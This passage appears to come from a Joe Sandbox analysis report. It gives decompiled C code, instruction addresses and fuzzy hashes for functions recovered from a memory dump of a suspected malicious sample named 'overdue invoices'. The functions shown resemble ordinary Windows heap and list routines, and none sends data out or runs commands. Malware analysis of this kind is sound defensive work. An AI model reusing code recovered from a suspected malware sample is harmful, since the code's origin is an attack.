						_push( *_t58 & 0x000000ff);
						E009D9AE0();
						_t23 = L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                  0x00a16c0a
                  0x00a16c0f
                  0x00a16c10
                  0x00a16c13
                  0x00a16c15
                  0x00a16c19
                  0x00a16c1c
                  0x00a16c21
                  0x00a16c28
                  0x00a16c3a
                  0x00a16c2a
                  0x00a16c33
                  0x00a16c33
                  0x00a16c3f
                  0x00a16c48
                  0x00a16c4d
                  0x00a16c60
                  0x00a16c65
                  0x00a16c69
                  0x00a16c73
                  0x00a16c79
                  0x00a16c7f
                  0x00a16c86
                  0x00a16c90
                  0x00a16c94
                  0x00a16ca6
                  0x00a16cb2
                  0x00a16cbd
                  0x00a16cbd
                  0x00a16cc3
                  0x00a16cc7
                  0x00a16ccb
                  0x00a16cd0
                  0x00a16cd1
                  0x00a16ce2
                  0x00a16ce2
                  0x00a16c69
                  0x00a16ced

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e4946cb2fda34bada0ec3642ca9046889ec1346e6eb446e435f933402d9dd5e
                  • Instruction ID: f33220d8b2796624f87e9a3089ed0ee257eb37fc61057018f6fb3f37808fd14a
                  • Opcode Fuzzy Hash: 8e4946cb2fda34bada0ec3642ca9046889ec1346e6eb446e435f933402d9dd5e
                  • Instruction Fuzzy Hash: 4221DE71A00644AFC711DFA8D980FAAB7B8FF88750F14416AF805CB791D634ED50CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D90AF Relevance: .1, Instructions: 76COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E009D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E009ED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E009CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L009B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E009DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E009CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                  0x009d90af
                  0x009d90b8
                  0x009d90bb
                  0x009d90bf
                  0x009d90c2
                  0x009d90c2
                  0x009d90c8
                  0x009d90cb
                  0x009d90cd
                  0x00a114d7
                  0x00a114eb
                  0x00a114eb
                  0x00000000
                  0x00a114eb
                  0x00a114db
                  0x00a114e6
                  0x00000000
                  0x00a114f2
                  0x00a114e8
                  0x00000000
                  0x00a114e8
                  0x009d90d8
                  0x009d90da
                  0x009d90dd
                  0x009d90e5
                  0x00000000
                  0x009d9139
                  0x009d90fa
                  0x009d90fe
                  0x009d9142
                  0x00000000
                  0x009d9142
                  0x009d9104
                  0x009d9107
                  0x009d910b
                  0x009d9110
                  0x009d9118
                  0x009d9147
                  0x009d9148
                  0x009d914f
                  0x009d9150
                  0x009d9151
                  0x009d9152
                  0x009d9156
                  0x009d915d
                  0x009d9160
                  0x009d9168
                  0x009d916c
                  0x009d91bc
                  0x009d91be
                  0x00000000
                  0x009d91be
                  0x009d916e
                  0x009d9173
                  0x009d9176
                  0x00000000
                  0x00000000
                  0x009d917c
                  0x009d9180
                  0x009d91b5
                  0x00000000
                  0x009d91b5
                  0x009d9182
                  0x009d9185
                  0x009d9189
                  0x00000000
                  0x00000000
                  0x009d918e
                  0x009d9190
                  0x009d9198
                  0x00000000
                  0x00000000
                  0x009d91a0
                  0x00000000
                  0x009d91ad
                  0x009d91ad
                  0x009d91b0
                  0x009d91b1
                  0x00000000
                  0x009d9185
                  0x009d911a
                  0x009d911c
                  0x009d911f
                  0x009d9125
                  0x009d9127
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                  • Instruction ID: 4be3e458361c99df6c128209127ce8acdbd7260d5c9c675adff40d1c7f1ae517
                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                  • Instruction Fuzzy Hash: 79217CB1A40206EFDB21EF99C845EAAF7F8EB54750F14886BF949A7351D234AD408B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C3B7A Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E009C3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0xa884c4; // 0x0
				_v12 = 1;
				_v8 =  *0xa884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0xa884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E009DAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E009DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0xa884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0xa884c4; // 0x0
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                  0x009c3b89
                  0x009c3b96
                  0x009c3ba1
                  0x009c3bab
                  0x009c3bb5
                  0x009c3bb9
                  0x00a06298
                  0x009c3bbf
                  0x009c3bc2
                  0x009c3bc3
                  0x009c3bc9
                  0x009c3bca
                  0x009c3bcc
                  0x009c3bcd
                  0x009c3bd4
                  0x009c3bd6
                  0x009c3bdb
                  0x009c3bea
                  0x009c3bf7
                  0x009c3bfb
                  0x009c3bff
                  0x009c3c09
                  0x009c3c0a
                  0x009c3c0b
                  0x009c3c0f
                  0x009c3c14
                  0x009c3c18
                  0x009c3c18
                  0x009c3bfb
                  0x009c3c1b
                  0x009c3c30
                  0x009c3c30
                  0x009c3c3d

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a22b6bc56d730a5e0363f9a11b450a60367958b39e393d417ae61a5ee8e8c1ab
                  • Instruction ID: bedf4dc08219b1e43b8e0a540c25884ed1440722e850cf79a240c0e41f88ef2e
                  • Opcode Fuzzy Hash: a22b6bc56d730a5e0363f9a11b450a60367958b39e393d417ae61a5ee8e8c1ab
                  • Instruction Fuzzy Hash: 6B21C272A40119AFC700DF98CD82F6EB7BDFB44308F154068E908AB262D775EE11CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A16CF0 Relevance: .1, Instructions: 74COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00A16CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E009B7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E009B7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x975c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E009CF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E009CF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E00A17016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L009B2400( &_v52);
								}
								_t21 = L009B2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                  0x00a16cfb
                  0x00a16d00
                  0x00a16d02
                  0x00a16d06
                  0x00a16d0a
                  0x00a16d0e
                  0x00a16d19
                  0x00a16d2b
                  0x00a16d1b
                  0x00a16d24
                  0x00a16d24
                  0x00a16d33
                  0x00a16d39
                  0x00a16d46
                  0x00a16d4f
                  0x00a16d61
                  0x00a16d51
                  0x00a16d5a
                  0x00a16d5a
                  0x00a16d69
                  0x00a16d6b
                  0x00a16d6d
                  0x00a16d6f
                  0x00a16d6f
                  0x00a16d74
                  0x00a16d79
                  0x00a16d7a
                  0x00a16d7f
                  0x00a16d82
                  0x00a16d88
                  0x00a16d89
                  0x00a16d90
                  0x00a16d94
                  0x00a16da7
                  0x00a16db1
                  0x00a16db1
                  0x00a16dbb
                  0x00a16dbb
                  0x00a16d90
                  0x00a16d69
                  0x00a16d46
                  0x00a16dc6

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8211a759a9cedd507556c0c945eeb3d96a27f08f66055a661905a22f51ffc191
                  • Instruction ID: 95ea477adb2f1cfcdc6308c96cd1b089a2e6b8d823ab6b0d1e82ee6caa718e4e
                  • Opcode Fuzzy Hash: 8211a759a9cedd507556c0c945eeb3d96a27f08f66055a661905a22f51ffc191
                  • Instruction Fuzzy Hash: BD21B072604B449BC711DF69DA44BEBB7ECEFC1790F04096AB980C7261E734D948C6A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CFD9B Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E009CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E009A76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                  0x009cfd9b
                  0x009cfda0
                  0x009cfda1
                  0x009cfdab
                  0x009cfdad
                  0x009cfdb0
                  0x009cfdb8
                  0x009cfe0f
                  0x009cfde6
                  0x009cfde9
                  0x009cfdec
                  0x00a0c0c0
                  0x009cfdfe
                  0x009cfe06
                  0x009cfe06
                  0x00a0c0c8
                  0x009cfe2d
                  0x009cfe2d
                  0x00000000
                  0x009cfe2d
                  0x00a0c0d1
                  0x00a0c0e0
                  0x00a0c0e5
                  0x00a0c0e5
                  0x00a0c0e8
                  0x00000000
                  0x00a0c0e8
                  0x009cfdf4
                  0x00000000
                  0x00000000
                  0x009cfdf6
                  0x009cfdfa
                  0x009cfe1a
                  0x009cfe1f
                  0x009cfe1f
                  0x009cfdfc
                  0x00000000
                  0x009cfdfc
                  0x009cfdcc
                  0x009cfdd0
                  0x009cfe26
                  0x00000000
                  0x009cfe26
                  0x009cfdd8
                  0x009cfddb
                  0x009cfddd
                  0x009cfde0
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                  • Instruction ID: e6da6c9bcaca09bbccb86014ba2f517701544891ce3ba51fb79b01fa119e4384
                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                  • Instruction Fuzzy Hash: C721BE72A00A41DFC730CF49D650F62F7EAEB94B10F20857EE84687662D7349C00DB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00999240 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00999240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0xa6f708);
				E009ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E009D95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E009D95D0();
				_t33 =  *0xa884c4; // 0x0
				L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0xa884c4; // 0x0
				L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0xa884c4; // 0x0
				E009B2280(L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0xa886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E009D95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E009D95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00999325();
					_t50 =  *0xa884c4; // 0x0
					return E009ED0D1(L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                  0x00999240
                  0x00999242
                  0x00999247
                  0x0099924c
                  0x0099924e
                  0x00999255
                  0x00999257
                  0x0099925a
                  0x0099925f
                  0x0099925f
                  0x00999266
                  0x00999271
                  0x00999276
                  0x00999279
                  0x0099927e
                  0x00999295
                  0x0099929a
                  0x009992b1
                  0x009992b6
                  0x009992d7
                  0x009992dc
                  0x009992e0
                  0x009992e6
                  0x009992e8
                  0x009992ee
                  0x00999332
                  0x00999333
                  0x00999337
                  0x00999338
                  0x0099933a
                  0x0099933a
                  0x0099933d
                  0x00999342
                  0x00999342
                  0x00999345
                  0x00999349
                  0x0099934e
                  0x00999352
                  0x00999357
                  0x009992f4
                  0x009992f4
                  0x009992f6
                  0x009992f9
                  0x00999300
                  0x00999306
                  0x00999324
                  0x00999324

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 28f81ec6d70b93840e316cd029dff16f5feab17a6710b7ce902f5538514f6212
                  • Instruction ID: 8f7a582fedf272fbf598dd6a2adf37629997cec4dbf6f23d8b62a7446bc90d91
                  • Opcode Fuzzy Hash: 28f81ec6d70b93840e316cd029dff16f5feab17a6710b7ce902f5538514f6212
                  • Instruction Fuzzy Hash: 1C213972091641EFC722EF68CE42F59B7B9FF48714F544A6CF0498A6A2CB34E941CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CB390 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  C-Code - Quality: 54%
                  			E009CB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E009B2280(_t12, 0xa88608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E009D00C2(0xa88608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                  0x009cb395
                  0x009cb3a2
                  0x009cb3a5
                  0x009cb3aa
                  0x009cb3b2
                  0x009cb3ba
                  0x009cb3bd
                  0x009cb3c0
                  0x009cb3c4
                  0x009cb3c9
                  0x00a0a3e9
                  0x00a0a3ed
                  0x00a0a3f0
                  0x00a0a3ff
                  0x00a0a403
                  0x00a0a409
                  0x00000000
                  0x00000000
                  0x00a0a40b
                  0x00a0a40b
                  0x00a0a40f
                  0x00a0a415
                  0x00a0a423
                  0x00a0a423
                  0x00a0a415
                  0x009cb3d1
                  0x009cb3e8
                  0x009cb3e8
                  0x009cb3d9

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41b9bb889b0c6162565187e6d1ec7678bd184d9a911eac26681c678da6559e52
                  • Instruction ID: 0e06d0ec40bab26cb477ef462be3ef366dc827defcda20a0be8b91383f9d7952
                  • Opcode Fuzzy Hash: 41b9bb889b0c6162565187e6d1ec7678bd184d9a911eac26681c678da6559e52
                  • Instruction Fuzzy Hash: 05114C37B151105BCB28DA149D82B6B7396EBD5330F24413DE916DB3C0DE355C01C796
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A24257 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00A24257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0xa708d0);
				E009ED08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E00A241E8(__ebx, __edi, __ecx, _t39);
				E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0xa887e4;
					_t18 =  *0xa887e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0xa85cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0xa887e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0xa887e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00997055(_t31 + 0xfffffff8);
								_t24 =  *0xa887e0; // 0x0
								_t18 = _t24 - 1;
								 *0xa887e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0xa85cd0;
				if( *0xa85cd0 <= 0) {
					L00997055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0xa887e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0xa887e8 = _t30;
						 *0xa887e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E009ED0D1(L00A24320());
			}















                  0x00a24257
                  0x00a24257
                  0x00a24257
                  0x00a24259
                  0x00a2425e
                  0x00a24263
                  0x00a24265
                  0x00a24273
                  0x00a24278
                  0x00a2427c
                  0x00a2427f
                  0x00a24281
                  0x00a24287
                  0x00a242d7
                  0x00a242d7
                  0x00a242da
                  0x00a2428d
                  0x00a2428d
                  0x00a2428f
                  0x00a24292
                  0x00a24297
                  0x00a2429c
                  0x00a242a0
                  0x00a242a6
                  0x00a242a8
                  0x00a242ae
                  0x00a242b3
                  0x00000000
                  0x00a242ba
                  0x00a242ba
                  0x00a242bf
                  0x00a242c5
                  0x00a242ca
                  0x00a242cf
                  0x00a242d0
                  0x00000000
                  0x00a242d0
                  0x00a242b3
                  0x00000000
                  0x00a242a6
                  0x00a2429c
                  0x00a242dc
                  0x00a242dc
                  0x00a242e3
                  0x00a24309
                  0x00a242e5
                  0x00a242e5
                  0x00a242e8
                  0x00a242ee
                  0x00a242f0
                  0x00000000
                  0x00a242f2
                  0x00a242f2
                  0x00a242f4
                  0x00a242f7
                  0x00a242f9
                  0x00a24300
                  0x00a24300
                  0x00a242f0
                  0x00a2430e
                  0x00a2431f

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d353e6b7d210c62a470d34dee403f127ee4660aebf5721cd830081a54c8e63bc
                  • Instruction ID: 8873f591c936fe889b41e27a7fbb5385cb58a16d443565a5b5480b316360d1d5
                  • Opcode Fuzzy Hash: d353e6b7d210c62a470d34dee403f127ee4660aebf5721cd830081a54c8e63bc
                  • Instruction Fuzzy Hash: 17216070902B11DFC715EFA9E500A54BBF1FB89715BA4827EE1158B2A1DF35D882CF40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A146A7 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00A146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E009DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E009CD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L009B77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                  0x00a146b7
                  0x00a146ba
                  0x00a146c5
                  0x00a146c8
                  0x00a146d0
                  0x00a146d4
                  0x00a146e6
                  0x00a146e9
                  0x00a146f4
                  0x00a146ff
                  0x00a14705
                  0x00a14706
                  0x00a1470c
                  0x00a14713
                  0x00a1471b
                  0x00a14723
                  0x00a14725
                  0x00a146d6
                  0x00a146d9
                  0x00a146db
                  0x00a146db
                  0x00a14732

                  Memory Dump Source
